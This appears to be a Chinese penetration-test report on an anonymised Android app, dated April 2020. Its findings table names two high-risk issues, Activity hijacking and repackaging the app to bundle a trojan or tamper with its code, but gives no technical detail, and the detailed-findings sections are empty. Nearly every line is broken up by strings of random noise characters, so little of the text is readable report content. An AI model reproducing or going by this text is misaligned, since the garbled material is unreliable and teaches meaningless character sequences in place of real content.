! s0 j" p3 p) x0 M" @6 ?: `6 r- q! v5 S3 K$ F2 S+ C! l
6 u- T' j- x8 P: e% f" P9 b4 I7 V- Q( O# `/ f' X! d+ C" |( Z
( F, @4 G4 f0 f. _/ B4 a
4 `6 F, s) F9 \$ x
7 r9 k% j# \1 i, r5 z, j6 E: F% U4 J4 g
% o; O( h6 x0 \7 `! A- Q% }7 v- U
% r6 o8 @' G7 G$ Y
; F; j3 m; _+ a' M. W6 U$ b/ t
! H6 n- t+ T/ T8 S7 K( [* r 文档编号: 5 I/ N5 c) N+ F$ v! m6 e
% ~: K, _' f+ A. [3 d/ f( r
! a4 e) g$ l- `2 o* U5 A$ F' W0 j$ F- e; k* G$ G
- o+ E, a( B2 f1 x
* g N# C, s% p 1 U) L( d6 q; G5 q
8 G$ z& }& N/ ?. s
2 H4 K7 r9 i4 }9 r) M* c! m
9 [9 c: o# V+ k6 l7 B . h7 ~' N! j0 O! b
' N0 |! \+ ~5 g: a6 D1 B2 ~1 q
4 E2 J) w4 P0 s g' B) L( R$ @7 M5 D+ W3 m; |9 b
5 B( @( d5 C: h& u Z" p% g
3 J5 ]) o0 Q9 H. s+ w) X2 Z
8 k( B6 L5 `) g1 a8 N
; V6 w# Z+ w V) @4 U# e% ~ 4 S& @' f3 g; K# i
. Z# E8 p! l+ ?9 s1 }8 S
6 {: u/ o; k% ^" |3 a3 N0 R
' z- @3 f6 E% x. z; a
3 o j w0 O% h' p1 {$ J- J1 p# T# U7 f* q+ U x
7 @1 F, F. g- y1 d' q( q
9 G5 v' N' ]; m. {6 ~$ y
% `5 n, u: }: {2 B8 t& E
5 N; i+ F" P$ H$ U8 a ' l3 P/ j0 |, D
! U- J" R; N) w% f+ l$ Q% N
3 H3 ?4 }# t5 r" s
( N5 N1 ~% \( c# D6 A! @
+ H; B: `& d, [
' e5 G+ @+ x$ Y) k& U% R. K
. c- A* h, _1 ?# m/ Z1 X+ m
' f$ Z% _( j7 I( K( F' I$ i 某某某APP渗透测试 ' F' p; E f5 H$ u2 K' A. g* n; a
: ^+ Q6 e* G; i7 S' B( v4 y' `
7 q+ L* N3 w8 ~& d* U3 o
) d9 f0 l( s1 z8 h1 Z
6 S* `) e1 T( F" d- t4 V, G( @" P) h3 V/ G' x \+ c; x
% d; W G/ t6 ~& v! R
; m& S. T7 a8 E. x) w. f* S! S) k! |
2 r/ |* J* k: z% o8 { O) A e
" B3 u$ ~3 s8 p |/ o/ b/ X( C ( G* F5 w3 o3 A3 V
5 |/ Q+ _5 G; O; B 8 ~2 }! E% {. p( B+ I1 v! V6 g
5 q o3 \4 w, J4 Y# S# k
0 g+ o2 c6 d: A" ^
$ A9 @0 w4 [: }8 f$ \% n, e s
* z' K* T" D$ r
8 @& |0 v8 ^) z: v6 r% _; f5 d# L 9 t7 S5 k4 _3 M. _' F0 R& a2 O
/ x& `- ^$ {8 k! w0 b& Q: g) P) }
* j4 y3 c3 h( N# e3 V1 ~% |/ n
1 P% O! e2 C& L 6 K9 E/ y" _9 q! o2 A
0 P( \& \* N+ `! ~1 Q% W8 K8 g" L
: F3 C8 p4 R; d- r2 w
3 u K& j% \9 A( }& X
( |: f/ D, ^( I
% ^, k5 v, J& j5 O 7 Y: Z: \, g- @# z/ ~0 c9 {& S
* q6 S) W( r( n$ c6 ] 技 术 报 告 , g5 }) e+ i( R* ?) b
6 [% Z/ D, g% F$ ?. e7 F: @, n0 c
/ Y" o G% u4 @$ F7 i& \; d
* V7 ?% `% }) N0 X$ J 8 m5 A* D: g$ U" m* K1 M0 v, f
' M1 p0 w; v8 t. h9 D1 x( r+ M
7 X- L/ j. C0 c% I v* x, f M- M5 {
% z" `4 H9 ]8 r! ^
$ E. a4 @; P5 H m: O% F2 U; B. Y4 F" A, w I8 |1 R, r
+ m' x& w1 A+ B1 N& H. F# }
. ]8 p) `3 F) M! s4 c+ C
9 I+ t7 [& |6 V- O9 i' d" Q0 J: @: x& a c# j* d! `% `) d
* b6 ~- `( V! h( ?3 s- R3 v
3 r3 V: l* R1 l7 v
+ E; z, L% G2 h8 q9 u- e
7 N9 ^" b4 I0 O4 I5 q5 N & Y2 Z5 X( n2 [/ K% n* ~0 v1 x
5 ~7 @: a F5 {; W X
% X- v" T/ t" P# H4 y
* [* \3 I4 c# T& X $ Y, N9 p" x# T; P
' Y- Y! w; x8 ?! _, ?( @
/ I6 M7 Y) a5 K& j( f% R: Z' D6 M; t# j$ q/ c# s+ u
6 [8 P/ U' { v
2 d: B6 w3 H& J( [5 \# Q* F- Z3 q
1 U2 z" {( I4 A; H) a
1 `3 C& A' {6 m- N1 h3 N' k# O . }4 O6 |9 D" ? l9 O n1 X- i
2 \$ ^ [2 |4 B/ O1 Y8 P
- P0 R" o8 V6 q
4 c- \! e/ j. I; _* S/ w' n7 X
# T9 F1 e9 o2 y \# h' t) B0 f4 {0 n# _# q
# s& u L6 `8 Y0 b, b1 X) s* ?) t
5 j4 i, \! `2 U" l+ W4 o, [; L
" Y% e- a, F6 X, j# q- A
# u; u! d) i" S9 z# z
; ]5 y3 }- u0 F* p% v1 E3 V
7 T) m% g; i, c' r3 Z( B& u : Q. w7 J, A# {2 ^$ h
* s* L+ y) r. d& V2 v( z
! `' n. J7 j4 g" O
( f! s2 O. H5 h% S: f
! e2 u* e; ]- J) c/ `% Q
a& ?& ^- I, w9 _9 F 1 J- B2 }+ A$ Q" }5 u
- j# Y( _7 b3 \3 V2 I9 a5 v! e
, H' m$ @* l( D0 Z, a2 O8 M
& e0 r! |- U* G5 ~( G+ z
5 Q) O, u0 l/ {% G
) F: e2 n2 o* g% M x# R$ t. l& M, g$ F2 w3 g* l
; Q: N: ~, h Y6 D
; `% S+ S. R' c$ o p. R+ X$ s
% U$ C/ P! `; B+ m# e9 r* i
9 d! v7 g9 C# c( Z, R: I2 |8 s/ `3 H/ p$ S% I5 P% j `: r
% m$ J7 P+ ]! ~
5 a8 K$ i2 ]& A% w
; @8 i" i# ^0 o, N; }, C- N+ y& e9 l, B
* }( V$ ]* T+ ~5 F6 g
% |8 T0 p" d' _8 I
* e0 S- n! p1 Q9 ?( ~3 A. g# f
' }, |4 \( D' L" K0 [0 W6 a
, h# X9 A! Y C7 [4 R- X' B
, E6 C. j1 l8 p" n N& `* `% P# _
, E/ d, O2 L& E3 h
! s3 J; @# c: _6 i& W8 Q
- f$ c. Z2 K: o8 ?+ Z P
1 A) B$ ~% \ U. K! A
0 @1 d# F2 |. |/ g: i6 V2 y
- ~9 p5 c4 U' Y
# z7 d- A( W A& X- U( N5 c3 U. U H' W8 g+ z
+ s+ [. ?' t0 }9 A
$ q& B( t: L) |% u$ n7 ?0 j% E2 {& P
6 }% P4 ]+ t% ^0 o1 ~7 h1 l# T3 l0 ^1 W* ] ]
, L$ _/ |2 l& Q& s8 E& C1 i6 |% F K+ D E/ {( Y. G
6 o# i2 e: d# u8 K2 C8 U
7 P/ u) p7 K2 d# b! G8 V
/ @+ V, B- ^' D( C% \ _; ]2 k/ [) _- z# m: a; o) Y: E
. e3 p u3 N' m2 Y: H% s' A% u# `1 S
1 s. l7 F6 T. z. K( l
4 f% ^6 Q3 t- T
9 E! o% W# B* c" T1 o/ R& o7 Q, f
8 [# U8 H. v8 b4 a
% |; g. F+ s, a! }3 \2 m
) q$ _" h; M/ j# I K8 Q) R% t
: y1 B8 l# w- R6 W% k1 m Y% t( A
7 T. I& A0 {# S2 X" Q* G+ O* I+ b
0 s( b8 c: @) t/ `0 K% R) ]2 y
" m! q. s* D$ \9 F
. g3 ~4 d" M) t7 L! m; s @+ X& }# F7 O3 Z* }' \% d
+ ^- `. C5 q$ e; ?; c$ G/ }) |2 H
2 T, F3 d @9 N: a: S
`: J* t* |8 J$ w6 o" L F( l9 s. h
5 R& W( w% |/ M9 y! W: I% n# o: i/ w3 X9 G O7 Q
8 L2 j& x; a S7 p$ X7 z
0 Z& L% ]6 r. o
" Q/ b0 h7 B+ ^. o4 ~' N; Z, R
+ K# l0 E$ {, {9 V |% i3 F% Q
; w* g3 x3 S& T$ a+ Z9 K
% U" H8 i" H7 C2 |4 f f! n8 m: ~ 二〇二〇年 " t7 G3 p& l* z) O! ]: g
' ~5 } v8 A4 E& G8 w
3 _. H) J$ ^* [% W- ]0 Q/ `0 C$ Z8 Z/ Y/ o% {. y
3 T& N$ F1 K+ }1 f5 J( [
, c$ i8 B8 ~, Y2 V; M/ Q" Q
7 T! O# ?- g. R% ^1 s3 R, y9 o7 O* A6 H, T7 t7 F+ o; U& b
2 h6 L( b! t. `' U
2 \- p- t; C- I' V# d* {( @ - I; {8 |2 r- E/ E" e/ z
/ P: Y7 M) K% L4 t% ?" ?/ r1 Q
9 i% I' \; H! |1 {: ]' w
; I) J4 D) `7 Q; L& ]5 n) V. D
7 R4 d2 Q' c0 L; X3 n% G
% M: h) z0 V( V. k# P0 ^
7 h/ {. W* X; T6 W& S1 H
) U+ F6 _3 P) C) ?' m) Z; A
9 p1 w( k' |0 y+ l( T1 C
9 |$ v4 r+ B, i9 P) v- j
1 q" S% E6 o' |; I; l U/ U9 q0 q1 A! c" Q6 }: A7 c" t
目 录
' p& F7 T# F- a! d0 \. U
6 Z5 T e# N' h1 K
1 `9 U5 A: I7 V+ W k' V
+ h! G3 P! H/ S
2 b8 {7 i. o9 ]% ]" o, E6 w# M( Z5 q- z5 s4 U' q j4 d5 v J
# v% U4 y0 K ^) x7 p) P: y, @5 H
/ `: y7 l9 h7 t+ x" @+ B* W- a0 a. U8 [# h
. `' t9 U6 T& }+ J5 u6 a: `$ P
- O2 k: `2 `' e8 `+ n
% W( }! W) n4 o
( W5 @5 N( r. x/ M; y+ v) ^
1 概述... 3
! [ j0 ?3 k) k/ q {/ a2 a
& q% L' v8 w, O% C& E4 N
' q5 k" ^) `6 o- _
8 U- u1 `# l" P; x+ V; G
, n9 u7 j6 I6 Z
7 y. ]6 _4 U* o3 q- l5 ^# R 1.2测试时间... 3 1 q7 z4 ~% T2 t' f* o# m
! }4 t' u+ T8 w' R. ~
1 [. `" S6 F, C3 I. D6 _6 l0 i
% l' g5 y- ^+ _, W: @8 }
?& t4 J7 {4 c( o% h# z
2 I& h3 W1 Z5 ^( l% c2 ~
1.3测试对象... 3
& ~$ }+ g* L1 S0 ]* g7 C. s/ N& S+ W2 ~$ B4 [
; ]3 e/ i) L- V& i* R
. @! L9 n6 P7 \: _2 W/ \8 s( m+ Z
0 M. F4 }! F9 k' y
9 Q8 l* T" Y# I9 P& o 1.4测试结果... 3 0 L7 A/ x, f( w. {+ N7 K0 u
, m; b, @8 F, Y; p% s' h
! f3 Z" x7 r% D. Z0 \( \ ?7 z% b+ I
: O7 l3 H" t& a, w* R& V+ X |
" F' v+ |/ M" {
2 检测结果... 4 5 q# R* [% V7 ^7 v, m5 l, t
1 h- D8 H2 G' V/ O5 z2 w1 t/ |& ]
) _$ t. B* P1 i" G1 [8 g0 Y1 p
$ I( ] B4 J h 5 o! F6 }& r2 `2 @
) n) W! q! F3 B* a. I$ o 2.1 某某某... 4
) T0 y1 g" q# a& T+ T+ J) x2 f! [% {/ i. \5 W) d$ H6 Z" V
9 q3 l5 z$ \/ Y+ F' l, J8 C! _. @5 `
* f4 D: U# [8 w3 J. T2 w4 l
$ W) G3 m' k% ^5 O0 g, e
8 p' N' y: s, O4 [) D 2.1.1检测目标... 4
- v! g: `' H' V A
- K3 q# w% Z" X
T. x! m4 i0 j" ?
4 P, j' g; Q# t+ y
" O$ A8 O: Y; U" ^( n
% x7 K9 N" |8 M5 _/ `2 [. R' r 2.1.2检测结果... 4
; i/ ]) W7 ]7 f+ V* _- N) T
& X/ A, r7 \1 d; G
3 B( v3 f6 Q# R' x6 N
( q" g4 Y/ y* r" \: w
) u; C, y0 h" u9 @% h" T! ]% t
5 \" w! \% D: i+ ]7 o. S! ^7 e 2.1.2.1. 4 # a3 o% H1 u: A; g0 h
8 k$ c z Q5 `& p1 S3 V2 ?
# R0 L8 z8 c3 [9 x
# p# u/ k" K& _
! R# a3 o$ K" j( U) \( r9 t$ \2 Q9 d# s; ]0 v! V
2.1.2.2. 6
, j: O# M. T- A* j( F2 Z& O
2 j# M5 `- S* P' U4 ]5 p
6 T) M' F+ M3 R& |7 h- O& k% X
% U* V6 a! {" Q2 g; B! j " A, r9 F/ ], U2 \
$ `% [0 T& m3 x* u+ {
$ w3 t0 H& N x) E9 @1 d5 \9 x5 v% k7 d$ _% H- P) @
F) R( r8 J( Y/ w- K, T8 q3 U2 u$ W) f6 e
8 w( p7 L) Q/ c5 {6 v$ `+ V7 X' k. W6 l9 k
& J9 V: T0 @; ~- e. B 7 z3 B. G( }* [3 K9 h, @
: S$ X3 I0 e' D! [& D
& F/ C* B/ {0 |& \3 G5 I3 v" G
0 n) r/ A3 k v) }$ b
' V4 [' F0 K* p: U) Z+ O& ~0 E
, U5 a8 S; t1 D6 K* ]9 ?$ p* N ) J2 ]+ K. h$ }3 g
- {3 Y* T/ @$ A# I( Z7 k 1 概述 ) q V- ^% `0 m4 ~) F+ p
% e7 O4 f1 r; P3 u# @4 v1 ]
" K9 i+ R9 Q# v; s7 n3 a
W. u* N8 \* D: q3 Y$ G
9 `5 Q+ B$ ?) N6 c8 g* w5 r- s$ \2 f7 S B5 r+ ^3 D4 J
1.2测试时间
2 ^( h7 j: a$ p/ g6 d1 T6 |
+ i! J4 j6 M) [0 l- r
. c6 n8 f# w* x) p
# n$ W. `) w, a) d3 k8 b( S1 J 8 R. l& A( x+ q
# N3 w8 {7 \4 s) e
# T: u- L/ a M
* n2 g9 I- T e, @3 r4 x: A2 n, d
2 L t* ]. K! [" ?5 L4 s5 \5 }4 S
9 Q4 k+ a+ L, y$ Y, o1 t* p; e | + t# J9 l& a8 ~0 T
: K! _2 G# V* G& J& O5 O$ G, z8 r
0 m- v$ ~% {/ H
3 z4 C: }; A9 I' b3 p/ Q E. t 渗透测试时间
) x0 v+ F( |* g) X8 E1 T' f6 J5 b n0 s1 s" }) }. Q
& b! r2 I" G% a3 w- s: r7 M% k: t4 y; c0 g
|
) B @; r1 _9 \4 k
' ^4 v! Q: j6 ~0 f/ J
4 I# u/ j! u! y5 a
# C7 }4 h: x& Y
" y2 a5 m' e( D: ~ r
* I0 X$ \6 X; A, Z, @ | 4 s: g( a* N3 O) p
: {0 L7 w5 R: E5 m/ E) h' x
4 A- Z" B: M* p% C9 I. ?
9 x. G, p3 q( i- R' I3 {4 j
起始时间 % _7 x6 x/ G$ p4 V% b0 g. B# p
\5 H$ |% `8 B7 N
- i' g" v2 s3 p/ {0 [! d8 l
4 E% F* r" Y1 j1 ~# d
|
6 F. r% F9 _$ b/ k1 z# j, f( N. t# Q! p+ E x2 Q0 |2 Z
; c3 h. F- A D. P1 v
5 Q* B$ ]3 C3 R
9 s. }* w/ X' R( c' ~; k! M2 i9 S8 a9 n$ V) n! C1 f
2020年4月6日
; Q3 Z" x* a) n) F6 b( P3 B7 {$ g2 l+ V0 c8 ?1 u! d% D4 b& e
0 D, l: q% C, O5 \
( g8 U! L8 N& v" | | 2 v( b1 F, B% u8 C, F4 f/ q/ Q
& B9 ?. U4 `2 {2 J% {
! q! Z8 w% k7 {/ o2 F: ]
. a2 {8 P( E+ Y! a' J0 ^0 [0 z 7 H, T; G0 U' l: q% ~
* `3 G+ x$ o/ C$ B ^4 a$ A+ E/ m) G; T | 8 C {/ L7 W" @# K0 ^: Y+ t P+ Q
: E8 O; u- l; [2 ?8 E3 y
: j/ j; H5 m l* b0 x* R# g/ `, k4 ^+ o1 {7 k1 v2 Z
结束时间
2 p% j8 n% L7 B$ W* K" g2 Q' m# {
* y) d3 u5 F* n& X N. n1 y
t5 t1 B- M* w8 H/ Y) w2 j5 N/ [ |
5 E; u8 T3 T, S+ U# K! _. c) `/ u
1 }2 \( k7 T: N. }" }& I3 q
# `9 r" R, o( d1 K. C 3 n, i! F! Z. C
7 k# S" y3 |+ s; [% @- B, \, E
2020年4月9日 8 }# X: `7 [' m: t
0 T$ J7 p4 b9 [8 B# j. Q, w8 H/ {
9 S8 k3 B2 {' Y
$ l. Q1 n9 s }
| 7 I) X6 T3 ?( I% |& {& l
5 c5 U; c, n5 d
2 v& x5 _( m) f- p
+ H/ [# b4 y. k+ [. e9 f7 t
]3 W. Y. `# D x2 g r) t/ |2 F$ _3 @1 K8 b |, s$ O
, ?0 Y# y$ P2 m& d+ Y8 |/ m7 h @! T8 f
& N. k7 W" U2 F2 i! q
- o% k( y5 S7 V! k! ^# L5 W% j; {4 e0 T0 u+ j' `8 X
1.3测试对象
/ B7 p( y# q3 z/ e5 s. x+ a0 J0 P8 d, d
1 I9 f- U I" q& i5 ]% _ e. ?7 D6 K, D& v" ~8 a6 ^
/ Z: G: d) ?; x0 M( R. q/ N+ Q; ^) O
此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示:
3 _3 O; t& x( y9 K8 `+ K" q- i
' j/ t- J7 \0 j
9 A, B2 I$ E6 @7 f
5 w0 Y/ K, f+ L [. @. U" [2 k
0 D7 R9 b; Y3 `
9 h# Q, j/ `6 d" \* N$ J
表1-1 检测对象
+ x" I& J0 L# T1 v2 d
& u) D9 ^' q) x! A
2 A) J; Q5 q6 x1 w6 Q% P8 p) H* G, x8 K3 z: H8 ~
" j* o* c0 a/ x! O2 t, w7 F8 j+ P5 v6 @1 z4 j- |9 L
" n, ^7 W$ r4 r1 G
( Z3 S7 I! Y& B1 R3 G8 v7 n9 J
e" ~6 Q# O5 f. K
7 h0 d/ q$ k: v' e9 F4 n | 7 @/ R6 d Z* U" y) j- x/ ]3 p
! |4 `7 h0 e& O8 m/ \; Z# H+ ?: O
1 `$ `3 P( Z, b9 S% m
1 t+ t2 N) y7 z9 j& A) Y9 K 序号 5 |; B. t8 q Q5 l0 K& j/ \
8 X L% P3 C1 E* K
* _: p6 ]6 W5 F/ n. M8 p# Y
5 w' s' c6 p' n) K | 0 n7 _" |$ ^/ E" B, b
( H" {8 A6 d$ O. p/ x1 z i
; n6 n; \8 L n R5 Z& K, w6 o. @# X: j7 L
3 C* N% a5 C# K
5 s) c5 E) s- f C) ? 测试对象 $ i t4 _- ~$ H' P, u% b- ~5 I$ T
6 I& J8 C6 D6 _! y# F5 B6 J
: i! ]4 h. }2 e$ |) I0 [; F/ g& ]+ e
: h; _& Y# d u# f" s3 Q% ~; T
|
8 y& F9 Y( i5 p
; k6 H$ E3 R; A
" d/ l _# n3 E5 d" e3 O% w) N* {5 {) b9 `0 a* t) D
, J0 J* z2 t6 _) F1 o* ~# K( [( g% }9 L2 @/ a- E Y5 \5 v
测试地址 ' @3 d! c0 z2 ?% u, `& i& l$ s
! n, ]4 U& L; _; k$ r1 i
8 y# h0 k1 R; t
9 p8 _# G. F: m |
8 @4 i$ y/ D- C
# y+ }. W' h5 s- c+ U1 E0 T
( a) A. p5 ^! s
* v" E8 y+ h' _9 v! w
3 g8 ~/ k Y2 n; |. ~' T1 h: E( i; c3 S. [
安全漏洞 0 g& s3 J3 _+ w& l* H
( K/ C$ k7 o8 {& g) k& j( E
. N! ^: ~9 x* I) q- V' ]. p/ R. p$ d! \# H1 V- Q
|
8 U* a5 e) a# ^$ W+ i3 u0 l* Z) n
. S" p m5 F1 m6 q: ]9 g; H4 a
& v _2 F }2 L4 Q( I
/ n2 [* p; H4 m7 D7 y% L9 _' N& z5 M& Q2 J
| 7 `" q4 ^( s% q/ U' u
( g7 U) e2 `8 {! c1 w5 c( T- j' M+ R
$ f- V9 ~* r; p6 i) l
5 P/ D: ~. |2 Y _3 {+ x 1
* o5 `# K7 H [. ^
$ {9 j3 b+ N, `: w
; I, j1 ?. ]9 [4 l
( r1 H0 E& U# Q& G" H1 Y | & c& K' ~* _5 @( s5 A7 m0 z7 W. y: \
( P" v" f a( c6 i! {
- D; h! G' y# f: Q ~ |/ m& w0 e T# K6 p w
! q9 S/ }) _+ C! K& ~: [+ Y6 U& [6 k8 @) z, G
某某某安卓APP 9 r* E( Z( M" o+ }$ Q6 s9 T `
7 Z4 e: o0 V# @9 [# o( S 2 ~( _2 ?9 U" C5 `8 Q
$ Z9 p3 B% \- P T9 I
| ! a7 L. o) C1 e9 o5 w }
3 g, y! I5 s8 P+ a4 l4 y# g* U& @ ; P/ w, h7 ^1 b9 m7 F4 d6 b; u6 S
( ]9 A8 s5 r! |- o1 \/ p0 d
; n9 T R) w: D3 l T' R" ^
8 z: }. E, I2 S1 w) |+ { 0 i5 Y: z* t) @, F2 |
7 v5 G- b) r0 m- ` O, N/ y
8 r$ l. e) L0 U
" H G' K( g7 Z | 1 q! p8 x- \/ |* b0 O+ e
1 T: }; ]% b% [+ P% ~5 W
2 J; j6 V1 n$ t) r% _, {5 h
* M: V" {# _/ [* Y & p) t0 J; V; t1 _/ g
; B" g" s- ]' H" g; M; B4 x! n 2 & D4 x9 x+ A7 Z& d& X* ^
/ X3 _; [0 j( m2 v/ A" _
3 t b5 b: C" A, l. B' O5 H: c
- B/ w7 F7 z# y, j# h; P |
. ]6 L! T! [! j/ C, }$ Y" Y- Z
/ E V- r8 D( g1 i
4 a/ o/ f9 v% n' `' x
$ K6 b/ x, j3 q$ \: B
I$ z: \6 X* m6 W' _" X
9 z1 N& I9 B- W3 M+ r) ^. P; d
5 x6 L1 b& W( |1 h% O u1 e
9 M# P0 C0 V$ K& F o
7 q0 \1 j1 c( v+ i* e6 {3 I( X7 N0 ]) L( G
1.4测试结果 / y2 g: p- o* d$ Y$ k1 b
- s4 R; B+ J( c% U; }
& j- \) B/ ?% t4 }; J3 y: _
" W0 {! i9 K* Q" `& _$ \6 s; K
3 v$ u2 g% w& b
& ~7 g9 L1 @- X( U, H8 Q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: . [6 `4 m" s/ f2 q+ V+ P
( S$ h4 D, I# v/ j& d. C( v# j
0 j+ C' c, v6 ]. a( A3 g/ z( h+ i4 @- {; F% L3 S
0 O* `- v" q/ [ f" y- [) s7 N& V
j0 J+ N( Q2 X2 ?* h
# g* g0 H, B$ a9 c
/ X: v: y& |" S3 J4 [. Q
x |- i" B2 i, Y& g
8 g! k7 n5 ?. `0 _% Y9 |
0 g5 Y' x$ j6 Y0 l. G, x
) \3 f7 Q0 W6 b9 w/ M# H( s + g1 U% G. d6 {2 i7 n6 B2 m, M% P
9 M8 c) M+ S4 b, n' S, u# ] 6 I* Z. w! s- H, x- u; s- |
+ ]2 ^* S" T, O! P8 r, \* A+ a
# k+ B3 D1 e$ D- R2 m2 V% C2 O
, i" c4 R/ T9 c9 G: @ |
7 u {& I# b! n6 D1 ^/ v. t5 ^0 P7 ^! `8 P' v6 i3 P; m$ X" Z
6 I% o7 g- j' f0 L2 S4 d, ?0 f3 r& g0 q
4 D. E, B0 _; S; ^5 n
序号
: I3 K+ k% x. `: `2 r
( r. v+ b) `' C/ G9 J7 {: r ' D8 K: b6 T7 t: J1 v
0 N* N1 Z: H* `( L
| : o1 \+ d9 T. R& \; ^4 d
; C$ Q) ?, V! v! O/ C q+ E
9 X z$ c0 f* g5 z! j
: I9 S5 R4 }7 n( d9 O- {& [ + B( U2 ~1 ?! L! g
P1 J$ _$ y% w; X$ [. L 系统名称 # z7 q* `: j- B* L3 ^
( v3 L* x f2 Z
( j0 w8 `3 D9 E0 P6 o9 o& B, n# S, d- p% X# {4 v1 A
| 3 h! r5 t# L& H) }, }" Q
) p$ S8 G1 A6 n3 S( j) E" J% ] - v% ~% a q+ U L, b N# W
: X0 F# q4 t/ O0 J& d ) @* v' I; H, A$ |) N7 d
; C1 l1 @5 F# s4 l+ D) t# o4 {5 H 漏洞名称
2 k9 ]: I5 R& B' y# i/ ]) v3 }5 {, i- ?6 q
* E v; j8 N5 L8 m0 o- Z
7 [; k: d3 y2 e N3 y$ C+ f |
/ \' c* T7 y' r. ~' F7 Q
$ K& G1 {$ Y- P, w
9 u* v8 F# l0 g, L
- G( m" p. B: f5 o! t4 m3 s& d
# M0 u( n9 m" p) X" d. o
+ Q; W. d- Y5 f: u 漏洞危害
x' C! Y& Q. l9 T# n1 v6 m0 @& \: U( V1 j) ^9 n( s
5 N+ Y }/ c- R4 X- c) W. T# h1 u2 G! Y
|
8 d- s: s0 {" t- o- t; p* b9 n2 r9 _* e: U5 L( f# _9 e* o/ F
( w( l! N- l# D1 g( F, B
% Z# x2 Z/ E, G, _2 A8 ^6 C
4 d: l1 S8 m3 E% }) r
& t# Y- j- ~" {- n 修复结果 0 L, G3 U9 }+ L9 N
, C/ x) w4 s1 m3 n 1 u4 J) T, T9 e* a& e- R0 [% p+ P
7 @( K0 ~2 [* D( R
|
: j8 H9 `8 u: l0 [' |
" K/ U) Y1 y& [# W+ `9 n* q( k% R
5 C! F3 e2 d" m
' I' R$ Q2 \2 f) P% q) X0 b
0 B: o. Y/ h H4 \0 U: i
9 |& d+ d8 H9 o# P3 q |
* Y" d( Y1 ~8 M0 V+ N# J4 `. Q7 D/ p5 H. v9 j0 H: L8 h" s
7 f, W# N( J L3 i0 t
( I! d+ {) q! f* m 1 + M2 I% i: G# D7 \+ M. H \
& T8 f4 t0 a- k: w" @
2 g! R* h4 ]7 o$ }- _
t6 Q9 P$ z/ d | 5 G" L- e3 T1 K4 H
% a- i% t! X* i8 f
5 G4 _+ q: K2 k( L5 K
" K' P/ w7 ^4 @( @ $ R0 s) a7 C1 e5 g
E, I) ~/ a% j6 ^: T) A7 ]
某某某某某某APP $ l+ O$ N- p& }; w7 `
- l+ x# i. |- H - j# }: Y6 B8 L
. P5 _& D: C% S, U0 N1 v( j6 V3 Y
|
4 \* S3 w1 ?! l6 ^4 ~2 y2 B9 v: q
) z* ^) Y( Q1 J1 i i
) o( n M7 ]& |2 V2 E4 e% t: k Y" Q- L) G$ ~" C
1 f k& ?6 U3 m' [$ J- s' ?2 m6 N% ^: R
Activity 劫持
: j6 Z8 {' p3 h3 C) F
3 M S; z1 K; r8 U3 s ) N N1 l# I9 V6 ?
1 A) T! M$ K5 l0 ^! f
7 t- R* ~1 [+ W$ ~( c t7 F6 U9 T0 c9 S! A) j5 W: `, I7 ?; k
) N; N, B0 a5 T/ y( J
* R0 K x( t, E' r 5 |* |3 d! y5 B+ a- @
/ N3 q9 A- C& _9 @
| ! t5 @, l, D1 _3 [- b
2 l& `, Y1 A( T2 V8 P
" i5 i1 z8 b* _+ s3 s% }& [) w
8 H7 \' B% i9 T
3 L E8 p7 d: n$ ?
3 y! U4 z- c9 S* Y 高
% }/ K4 h& v7 n5 |5 W7 q* S, k W; x' B2 f2 n% e
. ^! ?- V' { U; f/ H4 e# j# I5 ^- ]6 f( V
| * r) s% I/ X* ]5 x+ E# O- J' ?# W
: y$ J, F7 B" W; Y+ o+ i 0 z5 H# G! ], N. o
* Q8 i6 r. _/ {* C; g# X( [
# @) y8 I. a4 ^- w" N- |
9 Y. n# U7 R$ |( c# `8 }& h# Z
% ?5 \; y$ p3 W9 s$ |
! ]1 t' f% u& { f3 y * B1 Q! X& G* j q- l5 g4 }2 r9 G0 O8 n
- S& k1 P: d: e0 `
| 7 C, u7 o: U" b/ Y' h5 ~) f
; k0 a+ i% r8 X1 }
, a/ }3 F) Y5 g& @' p2 m
6 D% @! x: |2 a% |5 E- u3 r
1 G3 G+ {' m. w% W- `: @5 D4 ~
# P1 ^0 R* S7 T
| ' e* K7 e4 B r! T+ p$ A0 M& g
1 R- \$ T) f2 o2 L/ ^ * T$ f, K ]7 I" ]) Y" k$ w
, ?- L. D( u( {. ^% Y R 2 % m8 w* B& Y: u3 `1 r
2 {3 z8 U1 G3 p! K
/ }* \; p, O- u! v0 H8 h) V$ X8 c' p5 a3 _+ w g1 K
|
D" v: w( x5 _$ R2 `
]9 J7 a: J6 i: i7 L* Z2 @6 Y4 S: r
. b4 i X# }% Y3 h6 f4 X: c! D/ X8 q$ r; l, @4 Q9 M
# a9 v% ?2 m0 `9 v1 U: E: r5 |2 Z2 B# p
$ \$ X: h; I8 ]* y- H
某某某某某某APP
9 D, j, V% O7 D* M$ G; n' L) ^( k& m9 p8 ]( X6 A. a
, v# C7 ?! p7 t8 `. }' U
- @1 L3 v0 ]5 @4 q: F+ i& c
|
- }+ F8 F Y9 P- R+ a7 p3 g6 T! \/ K. x" ]* Q& ?
# G5 l/ [9 M" c
% g5 i a% t3 _/ Z1 {: W: r) I
: r5 n2 Q) ?7 \- o2 M) y: {& w* ~. R0 M! k& T* l7 B
反编译二次打包捆绑木马、篡改APP代码
% x0 i: R M' o6 H( G5 q/ F$ d/ U$ m3 L% h/ P, A, u0 [! d
3 Z H i0 L1 F- D1 m2 q& `( [% Y( Y0 j' C) I+ P( U z
|
$ y/ t7 g: {( k* Q( x5 W
# a6 o& w) }) h/ j& `0 v$ \3 U( u, o : {! E' ?* { @3 B& ?: p/ {! F
- l, J5 r x" @$ s9 e ( d" K3 {( W0 [- R; r
0 X# b4 d2 S$ t: n; C9 a$ L7 U2 c
高 + X* E+ W6 X$ f6 Q3 j H
2 v9 y' E- A9 s6 f; R& c+ p, o: r
" N1 v, Y/ O$ c3 I% H0 x A( L5 S# @' Y8 z" P
|
8 E; {. H2 o; o9 G
- D- P. t* {' r/ M! y& A, ~ {2 i
: q* y# X% g8 C1 c r: N1 O L0 f( h" q* T
; N' H1 G ?, b u
5 E7 v4 b5 E1 U P4 |: m
3 | I r# d- R6 \7 I9 e2 D9 f8 Z) ?, l; X: R8 s
6 D3 O! f# p+ {4 b! ^8 X3 A
, k! W; G+ B0 f1 W% J2 h2 q | 9 ?* e& }: Q' i- z/ y
, ^- N( l* Z' k" J2 a
F7 f _+ k* Q% g& j
, N8 s( @3 O/ p. m) V! M I0 z / Q7 h9 w# p$ Y
4 L- t5 v& l8 @" E- o$ [4 [2 a
